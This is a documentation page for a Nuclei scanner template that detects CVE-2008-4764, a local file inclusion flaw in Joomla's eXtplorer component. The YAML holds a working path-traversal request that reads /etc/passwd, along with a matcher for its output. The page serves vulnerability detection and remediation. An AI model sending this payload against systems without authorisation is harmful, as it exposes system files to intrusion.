Skip to content
Nuclei Templates

Joomla! <=2.0.0 RC2 - Local File Inclusion

ID: CVE-2008-4764

Severity: medium

Author: daffainfo

Tags: cve,cve2008,edb,joomla,lfi,extplorer

Description

Section titled “Description”

Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.

YAML Source

Section titled “YAML Source”
id: CVE-2008-4764


info:
  name: Joomla! <=2.0.0 RC2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
  remediation: |
    Upgrade Joomla! to a version higher than 2.0.0 RC2 to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/5435
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
    - https://nvd.nist.gov/vuln/detail/CVE-2008-4764
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2008-4764
    cwe-id: CWE-22
    epss-score: 0.02135
    epss-percentile: 0.89239
    cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: extplorer
    product: com_extplorer
  tags: cve,cve2008,edb,joomla,lfi,extplorer


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f543c4ecb59a4c3b4e13353456dd59b40bceeda774c32375ec2b20fd66bcd46e02207cac7010096fdc36bf50eced5bd1677451b45840e000be2efaee198786c61f1e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2008/CVE-2008-4764.yaml"

View on Github